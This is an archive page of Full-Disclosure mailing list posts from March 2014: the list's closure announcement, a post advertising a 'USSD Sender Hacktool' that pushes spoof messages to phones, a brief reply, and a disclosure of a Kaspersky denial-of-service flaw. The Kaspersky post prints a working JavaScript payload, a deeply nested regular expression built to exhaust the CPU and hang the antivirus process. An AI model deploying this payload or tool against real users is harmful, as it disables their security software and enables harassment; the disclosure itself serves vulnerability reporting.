[Full-disclosure] Administrivia: The End

2014-03-19 Thread John Cartwright
Hi

When Len and I created the Full-Disclosure list way back in July 2002,
we knew that we'd have our fair share of legal troubles along the way.  
We were right.  To date we've had all sorts of requests to delete 
things, requests not to delete things, and a variety of legal threats 
both valid or otherwise.  However, I always assumed that the turning 
point would be a sweeping request for large-scale deletion of 
information that some vendor or other had taken exception to.

I never imagined that request might come from a researcher within the 
'community' itself (and I use that word loosely in modern times).  But 
today, having spent a fair amount of time dealing with complaints from 
a particular individual (who shall remain nameless) I realised that 
I'm done.  The list has had its fair share of trolling, flooding, 
furry porn, fake exploits and DoS attacks over the years, but none of 
those things really affected the integrity of the list itself.  
However, taking a virtual hatchet to the list archives on the whim of 
an individual just doesn't feel right.  That 'one of our own' would 
undermine the efforts of the last 12 years is really the straw that 
broke the camel's back.

I'm not willing to fight this fight any longer.  It's getting harder 
to operate an open forum in today's legal climate, let alone a 
security-related one.  There is no honour amongst hackers any more.  
There is no real community.  There is precious little skill.  The 
entire security game is becoming more and more regulated.  This is all 
a sign of things to come, and a reflection on the sad state of an 
industry that should never have become an industry.

I'm suspending service indefinitely.  Thanks for playing.

Cheers
- John

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[Full-disclosure] USSD Sender Hacktool 1.0

2014-03-19 Thread AWeber Test
What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly use to 
make requests to a mobile operator. If you want to check how much money you 
have on your mobile sim card you can use a USSD Command for that. Entering for 
example *#100# to the vodafone network, you will receive an USSD message as a 
result.

USSD Sender Hacktool is a complex tool that let any web user to send a text 
message in a USSD command to any number. By default the message is "You have 
been hacked!" but you can send any text. In the target phone a message will pop 
up with the text and a OK button. If it get's undelivered an actual sms will be 
send.

Screen Shot:
http://i492.photobucket.com/albums/rr287/tribalmp/USSDSenderHacktool.jpg

Download:
http://www.firedrive.com/file/C961587BD8BCD4C9___
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Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google vulnerabilities with PoC

2014-03-19 Thread Leutnant Steiner
http://thehackernews.com/2014/03/watch-out-scammers-targeting-google.html


2014-03-17 20:44 GMT+01:00 The Doctor :

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA512
>
> On 03/15/2014 02:52 PM, Stefan Jon Silverman wrote:
> > Running ... out ... of ... popcorn -- must .. resupply ...
>
> While this inspiring and amusing thread has been going on, what
> happened that we missed because we were too busy watching the fur fly?
>
> - --
> The Doctor [412/724/301/703] [ZS]
>
> PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F  DD89 3BD8 FF2B 807B 17C1
> WWW: https://drwho.virtadpt.net/
>
> IHOP: The world's largest, most popular goth club.
>
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v2.0.22 (GNU/Linux)
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iEYEAREKAAYFAlMnUIoACgkQO9j/K4B7F8H9qACg206K0zsz7Eyv7Whu7UUB3zkn
> lNEAnjuoLXknIuKXFrVQwhPFJmjLx6ln
> =wWkp
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



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[Full-disclosure] Kaspersky 14.0.0.4651 RegExp Remote Denial of Service PoC2

2014-03-19 Thread [CXSEC]
Kaspersky has released updated for first PoC presented here

http://www.youtube.com/watch?v=joa_9IS7U90 (
http://seclists.org/fulldisclosure/2014/Mar/166)

but there are still many combinations of evil patterns. For exmaple next
PoC2 is available here

https://www.youtube.com/watch?v=9PYtL0zck3I

code:
https://devilteam.pl/regex2.html

--


RegExp Resource Exhaustion 



var patt1=new
RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)");
document.write(patt1.exec("peace"));



--

These expression leads to hang up kaspersky process by CPU Exhaustion.
 Making it impossible to shut down and restart Kaspersky GUI.
A weak implementation of RE difficult defense against this type of attack.
In my opinion the most stable implementation of regular expressions is
NetBSD/OpenBSD where the authors have reduced the risk of leakage of
resources by the level of recursion.

References:
http://cxsecurity.com/issue/WLB-2014030108

Best regards,
CXSEC TEAM
http://cxsec.org/
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